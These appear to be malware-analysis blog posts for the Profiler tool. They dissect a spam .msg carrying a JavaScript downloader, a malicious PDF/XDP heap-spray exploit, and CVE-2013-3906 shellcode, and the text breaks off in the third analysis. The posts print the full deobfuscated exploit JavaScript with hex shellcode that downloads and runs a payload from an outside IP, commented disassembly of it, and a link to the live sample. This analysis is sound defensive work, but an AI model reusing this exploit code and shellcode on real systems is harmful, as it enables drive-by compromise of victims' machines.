Malware in a MSG

Even though sending malware via zipped attachments in spam emails is nothing new and had been around for eons but many people are still puzzled at how it works. Thus, I will go through with you on how to do it with Profiler. I will try to fill in required information about where to look out for information and how decode some of the information.

Firstly, we are going to learn how are a bit about the .msg file format and how is it used to store a message object in a .msg file, which then can be shared between clients or message stores that use the file system.

From an investigator’s point of view, you should always analyze the .msg file without installing Outlook. In order to analyze the .msg file without Outlook, we can read more about the file format from:

  • http://download.microsoft.com/download/5/D/D/5DD33FDF-91F5-496D-9884-0A0B0EE698BB/[MS-OXMSG].pdf
  • https://msdn.microsoft.com/en-us/library/cc463912(v=exchg.80).aspx
  • http://www.fileformat.info/format/outlookmsg/

The purpose of this post is to give a better technical understanding of how attackers makes use spam emails to spread malware.

[ Sample used in the analysis ]
MD5: BC1DF9947B9CF27B2A826E3B68C897B4
SHA256: C7AC39F8240268099EC49A3A4FF76174A50F1906BBB40AE6F88425AF303A44BB
Sample: Sample

[ Part 1 : Getting Started ]
For those who want to follow along, this is a link to the .msg file. Do note, this is a MALICIOUS file, so please do the analysis in a “safe” environment. The password to the attachment is “infected29A

Now, let’s start getting our hands dirty…and open the suspicious .msg file.

The msg file is already flagged by Profiler, as it contains some suspicious features.
Each “__substg” contains valuable pieces of information. The first four of the eight digits at the end tells you what kind of information it is (Property). The last four digits tells you the type (binary, ascii, Unicode, etc)

  • 0x007d: Message header
  • 0x0C1A: Sender name
  • 0x0C1F: Sender email
  • 0x0E1D: Subject (normalized)
  • 0x1000: Message body

[ Part 2 : Email investigation ]
If we are interested in email investigation, let’s check out the following file, “__substg1.0_0C1F001F”.

As we can see below, the sender’s email address is “QuinnMuriel64997@haarboutique-np.nl
But is it really sent from Netherlands?

Well, let’s check out the message header located in “__substg1.0_007D001F” to verify that.

If we were to do through the message header, do a whois on “haarboutique-np.nl” and check out the MX server. We can confirm that the sender is spoofing email as well.

From the message header, we can conclude that the sender sent the email from “115.78.135.85” as shown in the image and the extracted message header as shown below.

    Received: from [115.78.135.85] ([115.78.135.85])
    by mta02.dkim.jp (8.14.4/8.13.8) with ESMTP id u44L8X41032666
    for <info@dkim.jp>; Thu, 5 May 2016 06:08:35 +0900

Whois information showed that IP address where this spam email is sent from is from Vietnam.
But it doesn’t mean that the attacker is from Vietnam. Anyone in the world can buy web hosting services in Vietnam. This is just to let you know that the attacker is definitely not sending from “haarboutique-np.nl

[ Part 3 : Email investigation ]
Using this information opening the “__substg1.0_0E1D001F” file and we can see the subject, “Re:

Hmmmm…this doesn’t look any useful at all. Let’s try opening the file, “__substg1.0_1000001F”, containing the “subject body” instead.

      “Hi, info

Please find attached document you requested. The attached file is your account balance and transactions history.

Regards,
Muriel Quinn”

Awesome, Muriel Quinn is sending me my account balance and transactions history which I may or may not have requested at all. Awesome, he is also attaching the files to the email just for me. This is definitely suspicious to me.

[ Part 4 : Email attachment ]
Now that we are interested in the attachments, let’s look at “Root Entry/__attach_version1.0_#00000000” and refer to the specifications again.

  • //Attachments (37xx):
  • 0x3701: Attachment data
  • 0x3703: Attach extension
  • 0x3704: Attach filename
  • 0x3707: Attach long filenm
  • 0x370E: Attach mime tag

If we were to look at “__substg1.0_3704001F”, we will see that the filename of the attachment is called “transa~1.zip” and the display name “__substg1.0_3001001F” of the attachment is called “transactions-625.zip”.

Now let’s look at the actual data located within “__substg1.0_37010102” as shown below.

Now, let’s press “Ctrl+A” to select the entire contents. Then copy it into a new file as shown in the image below.

But as we can see on the left, Profiler can identify what is inside the attachment. There are 3 Javascript files inside the .zip file.

Now let’s fire up “New Text View” and copy the contents of “transactions 774219.js” as shown below.

Press “Ctrl+R” and select “Beautify JavaScript” and Profiler will “JSBeautify” it for you. But let’s add some “Colouring” to it by doing “Right-click -> Language -> JavaScript” as shown below.

We can use Profiler to debug the JavaScript but I shall leave that as an exercise for the readers.
The decoded JavaScript will look something like this.

As we can see from the image above, it is downloading from “http://infograffo[.]com[.]br/lkdd9ikfds” and saving it as “ew3FbUdAB.exe” in the victims’ TEMP directory.

We won’t be going through on reversing the malware.

In the meantime, we hope you enjoyed reading this and would be happy to receive your feedback!

PDF/XDP Malware Reversing

Recently version 2.6 of Profiler has been released and among the improvements support for XDP has been introduced. For those of you who are unfamiliar with XPD, here’s the Wikipedia description:

“XML Data Package (XDP) is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

XDP is XML 1.0 compliant. The XDP may be a standalone document or it may in turn be carried inside a PDF document.

XDP provides a mechanism for packaging form components within a surrounding XML container. An XDP can also package a PDF file, along with XML form and template data. When the XFA (XML Forms Architecture) grammars used for an XFA form are moved from one application to another, they must be packaged as an XML Data Package.”

So I’ll use the occasion to show the reversing of a nice PDF with all the goodies. Let’s open the suspicious PDF.

The PDF is already heavily flagged by Profiler, as it contains many suspicious features.

If we take a look, just out of curiosity, at the object 8 of the PDF we will notice that the XDP data contains a bogus endstream keyword to fool the parsers of security solutions.

Profiler handles this correctly, so we don’t have to do anything, just worth mentioning.

Let’s take a look at the raw XDP data.

As you can see, it is completely unreadable because of the XML escaped characters. Even this is not really important for us, since the XML parser of Profiler handles this automatically, again just worth mentioning.

So let’s open directly the embedded XDP child and we can see a readable and nicely indented XML.

We can see that the XML contains JavaScript code, but Profiler already warns us of this. So let’s just click on the warning.

The code isn’t readable. So let’s select the JavaScript portion and then press Ctrl+R->Beautify JavaScript.

Much better, isn’t it?

The code is quite easy to understand although it’s obfuscated. It takes a value straight from the XDP, processes it and then calls eval on it.

This is the value it takes:

What we want is the result of the processing, before eval is called. So what I did is to modify slightly the JavaScript code like this:

ar = [HUGE STRING];
ar = ar.split('%%%');
s = Array();
cc = {
    q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;
function test3()
{
    if (s) v = ar[z] * 1;
    s = s + cc[v + 24];
}

for (i = 0; i - 3794 < 0; i++)
{
    z = i;
    test3();
}

print(s);

I didn't paste now the entire value in here as it was way too big, but I did so in the code edit:

At this point, we can just press Ctrl+R->Debug/Execute JavaScript and get the result of the execution.

We will get the following code:

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = app;
_l4 = new Array();

function _l5()
{
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1)
{
    ret = '';
    for (i = 0; i < _I1.length; i += 2)
    {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++)
    {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6)
{
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
    {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3()
{
    _j4 = _l5();
    if (_j4 < 9000)
    {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    }
    else
    {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with(
    {
        k: _ll3
    }) _I0(k);
    qwe123b.rawValue = _ll1
}
_j3();

What it does is basically to spray the heap using an array. It changes the payload based on the version of Adobe Reader. The version is retrieved by calling the _l5 function.

Now we could just examine the _l1 or _l2 payloads directly, but just to make sure I let the code generate a spray portion. So I changed the code accordingly and avoided to actually spray a lot of data.

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = this;
_l4 = new Array();

/*function _l5()
{
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}*/
function _l7(_l8, _l9)
{
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 0x2000);
    for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1)
{
    ret = '';
    for (i = 0; i < _I1.length; i += 2)
    {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++)
    {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6)
{
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
    {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function asciiToHex(str)
{
    var arr = [];
    for (var n = 0, l = str.length; n < l; n ++) 
    {
        var ch = str.charCodeAt(n);
        var hex = Number(ch & 0xFF).toString(16);
        if (hex.length < 2) hex = "0" + hex;
        arr.push(hex);
        hex = Number(ch >>> 8).toString(16);
        while (hex.length < 2) hex = "0" + hex;
        arr.push(hex);
    }
    return arr.join('');
}
function _j3()
{
    _j4 = 9000;
    if (_j4 < 9000)
    {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    }
    else
    {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with(
    {
        k: _ll3
    }) _I0(k);
    print(asciiToHex(_l4[0]));
}
_j3();

We can run this script in the JavaScript debugger (Ctrl+R->Debug JavaScript).

The final print will give us the payload in memory. We can copy the just the initial part, avoiding the padding. Let's paste the string into a text editor in Profiler and then Ctrl+R->Hex string to bytes.

If we look at the payload, we can see that the beginning (the marked portion) looks like ROP code. So in order to avoid looking for the gadgets in memory, let's skip the ROP as it most likely is only going to jump to the actual shellcode. Let's assume that is the case and thus focus on the data which follows.

We can see a web address at the end of the data. So we could just assume that the shellcode downloads an executable and runs it. But just for the sake of completeness, let's analyze it.

We can of course disassemble the shellcode by applying a filter to it (Ctrl+T->x86 disasm). But what we'll do is to use a debugger via Ctrl+R->Shellcode to execute. This way we can quickly step through what it does.

Here's the commented code:

00000000 66 83 E4 FC        and       sp, 0xfffc
00000004 FC                 cld       
00000005 85 E4              test      esp, esp
00000007 75 34              jne       0x3d

0000000A 5F                 pop       edi
0000000B 33 C0              xor       eax, eax
0000000D 64 8B 40 30        mov       eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C           mov       eax, dword ptr [eax + 0xc]
00000014 8B 70 1C           mov       esi, dword ptr [eax + 0x1c]
00000017 56                 push      esi
00000018 8B 76 08           mov       esi, dword ptr [esi + 8]
0000001B 33 DB              xor       ebx, ebx
0000001D 66 8B 5E 3C        mov       bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C        add       esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF  sub       esi, 0xffff1015
0000002B B8 8B 40 30 C3     mov       eax, 0xc330408b
00000030 46                 inc       esi
00000031 39 06              cmp       dword ptr [esi], eax
00000033 75 FB              jne       0x30
00000035 87 34 24           xchg      dword ptr [esp], esi
00000038 85 E4              test      esp, esp
0000003A 75 51              jne       0x8d

0000003D EB 4C              jmp       0x8b

; resolve API
0000003F 51                 push      ecx
00000040 56                 push      esi
00000041 8B 75 3C           mov       esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78        mov       esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5              add       esi, ebp
0000004A 56                 push      esi
0000004B 8B 76 20           mov       esi, dword ptr [esi + 0x20]
0000004E 03 F5              add       esi, ebp
00000050 33 C9              xor       ecx, ecx
00000052 49                 dec       ecx
00000053 41                 inc       ecx
00000054 FC                 cld       
00000055 AD                 lodsd     eax, dword ptr [esi]
00000056 03 C5              add       eax, ebp
00000058 33 DB              xor       ebx, ebx
0000005A 0F BE 10           movsx     edx, byte ptr [eax]
0000005D 38 F2              cmp       dl, dh
0000005F 74 08              je        0x69
00000061 C1 CB 0D           ror       ebx, 0xd
00000064 03 DA              add       ebx, edx
00000066 40                 inc       eax
00000067 EB F1              jmp       0x5a
00000069 3B 1F              cmp       ebx, dword ptr [edi]
0000006B 75 E6              jne       0x53
0000006D 5E                 pop       esi
0000006E 8B 5E 24           mov       ebx, dword ptr [esi + 0x24]
00000071 03 DD              add       ebx, ebp
00000073 66 8B 0C 4B        mov       cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC           lea       eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C        call      dword ptr [esp + 0xc]
0000007E 8B D8              mov       ebx, eax
00000080 03 DD              add       ebx, ebp
00000082 8B 04 8B           mov       eax, dword ptr [ebx + ecx*4]
00000085 03 C5              add       eax, ebp
00000087 AB                 stosd     dword ptr es:[edi], eax
00000088 5E                 pop       esi
00000089 59                 pop       ecx
0000008A C3                 ret       

0000008B EB 53              jmp       0xe0

0000008D AD                 lodsd     eax, dword ptr [esi]
0000008E 8B 68 20           mov       ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33        cmp       byte ptr [ebp + 0xc], 0x33
00000095 74 03              je        0x9a
00000097 96                 xchg      eax, esi
00000098 EB F3              jmp       0x8d
0000009A 8B 68 08           mov       ebp, dword ptr [eax + 8]
0000009D 8B F7              mov       esi, edi
0000009F 6A 05              push      5
000000A1 59                 pop       ecx
000000A2 E8 98 FF FF FF     call      0x3f ; resolve API
000000A7 E2 F9              loop      0xa2 ; loops resolving the following APIs:
                                            ; LoadLibraryA
                                            ; WinExec
                                            ; TerminateThread
                                            ; GetTempPathA
                                            ; VirtualProtect
000000A9 E8 00 00 00 00     call      0xae
000000AE 58                 pop       eax
000000AF 50                 push      eax
000000B0 6A 40              push      0x40
000000B2 68 FF 00 00 00     push      0xff
000000B7 50                 push      eax
000000B8 83 C0 19           add       eax, 0x19
000000BB 50                 push      eax
000000BC 55                 push      ebp
000000BD 8B EC              mov       ebp, esp
000000BF 8B 5E 10           mov       ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05           add       ebx, 5
000000C5 FF E3              jmp       ebx  ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00     push      0x6e6f
000000CC 68 75 72 6C 6D     push      0x6d6c7275 ; pushes URLMON string to stack
000000D1 54                 push      esp
000000D2 FF 16              call      dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08           add       esp, 8
000000D7 8B E8              mov       ebp, eax
000000D9 E8 61 FF FF FF     call      0x3f ; resolves URLDownloadToFileA
000000DE EB 02              jmp       0xe2

000000E0 EB 72              jmp       0x154

000000E2 81 EC 04 01 00 00  sub       esp, 0x104
000000E8 8D 5C 24 0C        lea       ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov       dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov       dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov       dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53                 push      ebx
00000104 68 F8 00 00 00     push      0xf8
00000109 FF 56 0C           call      dword ptr [esi + 0xc] ; call GetTempFilePathA
0000010C 8B E8              mov       ebp, eax
0000010E 33 C9              xor       ecx, ecx
00000110 51                 push      ecx
00000111 C7 44 1D 00 77 70+ mov       dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov       dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00     mov       byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59                 pop       ecx
00000127 8A C1              mov       al, cl
00000129 04 30              add       al, 0x30
0000012B 88 44 1D 04        mov       byte ptr [ebp + ebx + 4], al
0000012F 41                 inc       ecx
00000130 51                 push      ecx
00000131 6A 00              push      0
00000133 6A 00              push      0
00000135 53                 push      ebx
00000136 57                 push      edi
00000137 6A 00              push      0
00000139 FF 56 14           call      dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0              test      eax, eax
0000013E 75 16              jne       0x156
00000140 6A 00              push      0
00000142 53                 push      ebx
00000143 FF 56 04           call      dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00              push      0
00000148 83 EB 0C           sub       ebx, 0xc
0000014B 53                 push      ebx
0000014C FF 56 04           call      dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C           add       ebx, 0xc
00000152 EB 02              jmp       0x156

00000154 EB 13              jmp       0x169

00000156 47                 inc       edi
00000157 80 3F 00           cmp       byte ptr [edi], 0
0000015A 75 FA              jne       0x156
0000015C 47                 inc       edi
0000015D 80 3F 00           cmp       byte ptr [edi], 0
00000160 75 C4              jne       0x126
00000162 6A 00              push      0
00000164 6A FE              push      -2
00000166 FF 56 08           call      dword ptr [esi + 8] ; calls TerminateThread

00000169 E8 9C FE FF FF     call      0xa

So yes, in the end it just downloads the file from the address we've seen and tries to execute it, then tries to register it as a COM object. Some AV-evasion techniques are also present.

Cheers!

Analysis of CVE-2013-3906 (TIFF)

This is just a demonstration of malware analysis with Profiler, I haven’t looked into previous literature on the topic. So, perhaps there’s nothing new here, but I hope it will be of help for our users.

We open the main DOCX file. The first embedded file we analyze is the TIFF image, which stands out because it’s the only image.

TIFF directories

Among the directories we have two which specify an embedded JPEG. So we just select the data area according to the offset and length value and load it as an embedded JPEG (it’s a good idea to do this automatically in the future: bear with us, TIFF support has been just introduced).

JPEG data

JPEG embedded

Now we can inspect the embedded JPEG.

JPEG meta

The JPEG looks strange. Even by looking at the format fields, it looks malformed. Given certain anomalies we can suppose that the TIFF might be used as some sort of vector for something. Let’s keep that in mind and let’s take a look at other files. Two of them stand out: they have a .bin extension and are CFBFs (same format as DOC files).

CFBF Foreign

We immediately notice various problems. Foreign data is abundant and the file looks malformed. More alarmingly lots of shellcode warnings are reported. Let’s look at a random one (they are all the same basically).

CFBF Shellcode

Let’s start with the analysis of this shellcode.

; nop slide
00001000:  nop 
00001001:  nop 
00001002:  nop 
00001003:  nop 

; decryption code
00001004:  and sp, 0xfffc
00001009:  jmp 0x101c
0000100B:  pop ebx
0000100C:  dec ebx                         ; address of 1020
0000100D:  xor ecx, ecx
0000100F:  or cx, 0x27e                    ; ecx = 0x27E
00001014:  xor byte ptr [ebx+ecx*1], 0xee  ; xor every byte with 0xEE
00001018:  loop 0x1014
0000101A:  jmp 0x1021
0000101C:  call 0x100b

The start of the shellcode is just a decryption loop which xors every byte following the last call with 0xEE. So, that’s exactly what we’re going to do. We select 0x27E bytes after the last call, then we press Ctrl+T to open the filters view.

Decrypt shellcode

We use two filters: ‘misc/basic‘ to xor the bytes and ‘disasm/x86‘ to disassemble them.

At this point it’s useful to load the shellcode into a debugger. So let’s select the decrypted shellcode and press Ctrl+R and activate the ‘Shellcode to executable‘ action:

Shellcode to executable

The options dialog will pop up.

Shellcode to executable options

After pressing OK, the debugger will be executed. Depending on your debugger, put a break-point on the beginning of the shellcode and run the code.

The start of the shellcode resolves API addresses:

; resolve APIs
00001021:  jmp 0x1252
00001026:  pop edi                         ; edi = 0x1257
00001027:  mov eax, dword ptr fs:[0x30]
0000102D:  mov eax, dword ptr [eax+0xc]
00001030:  mov esi, dword ptr [eax+0x1c]
00001033:  lodsd dword ptr [esi]
00001034:  mov ebp, dword ptr [eax+0x8]
00001037:  mov esi, dword ptr [eax+0x20]
0000103A:  mov eax, dword ptr [eax]
0000103C:  cmp byte ptr [esi], 0x6b        ; 'k'
0000103F:  jnz 0x1034
00001041:  inc esi
00001042:  inc esi
00001043:  cmp byte ptr [esi], 0x65        ; 'e'
00001046:  jnz 0x1034
00001048:  inc esi
00001049:  inc esi
0000104A:  cmp byte ptr [esi], 0x72        ; 'r'
0000104D:  jnz 0x1046
0000104F:  inc esi
00001050:  inc esi
00001051:  cmp byte ptr [esi], 0x6e        ; 'n'
00001054:  jnz 0x1046
00001056:  mov esi, edi                    ; esi = 0x1257
00001058:  push 0x12
0000105A:  pop ecx
0000105B:  call 0x120d
00001060:  loop 0x105b

This code basically retrieves the base of ‘kernel32.dll‘ and then resolves API address by calling 0x120d for 0x12 times (which is the amount of APIs to be resolved).

This is the function which resolves API names hashes to addresses:

; retrieve API from hash
0000120D:  push ecx
0000120E:  push esi
0000120F:  mov esi, dword ptr [ebp+0x3c]
00001212:  mov esi, dword ptr [esi+ebp*1+0x78]
00001216:  add esi, ebp
00001218:  push esi
00001219:  mov esi, dword ptr [esi+0x20]
0000121C:  add esi, ebp
0000121E:  xor ecx, ecx
00001220:  dec ecx
00001221:  inc ecx
00001222:  lodsd dword ptr [esi]
00001223:  add eax, ebp
00001225:  xor ebx, ebx
00001227:  movsx edx, byte ptr [eax]
0000122A:  cmp dl, dh
0000122C:  jz 0x1236
0000122E:  ror ebx, 0xd
00001231:  add ebx, edx
00001233:  inc eax
00001234:  jmp 0x1227
00001236:  cmp ebx, dword ptr [edi]
00001238:  jnz 0x1221
0000123A:  pop esi
0000123B:  mov ebx, dword ptr [esi+0x24]
0000123E:  add ebx, ebp
00001240:  mov cx, word ptr [ebx+ecx*2]
00001244:  mov ebx, dword ptr [esi+0x1c]
00001247:  add ebx, ebp
00001249:  mov eax, dword ptr [ebx+ecx*4]
0000124C:  add eax, ebp
0000124E:  stosd dword ptr [edi]
0000124F:  pop esi
00001250:  pop ecx
00001251:  ret 

The API hashes are stored at the end of the shellcode. Here are the hashes and the resolved APIs:

; API hashes

Offset     0 1 2 3

00000000  33CA8A5B ; GetTempPathA
00000004  03B8E331 ; FreeLibraryAndExitThread
00000008  A517007C ; CreateFileA
0000000C  FB97FD0F ; CloseHande
00000010  1F790AE8 ; WriteFile
00000014  02FA0DE6 ; GetCurrentProcessId
00000018  EDDF54E4 ; CreateToolhelp32Snapshot
